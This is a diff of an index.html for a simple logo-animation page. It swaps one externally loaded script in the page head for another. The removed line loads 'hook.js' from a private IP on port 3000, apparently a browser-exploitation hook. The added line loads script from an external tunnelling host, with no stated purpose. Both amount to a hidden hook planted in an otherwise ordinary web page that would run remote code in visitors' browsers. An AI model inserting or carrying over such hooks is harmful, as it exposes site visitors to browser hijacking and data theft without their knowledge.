--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-<script src="http://192.168.1.102:3000/hook.js"></script>
+<script src="https://xhamstr.pagekite.me/"></script>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Image with Coin-Spinning Logo and Lightning Effect</title>
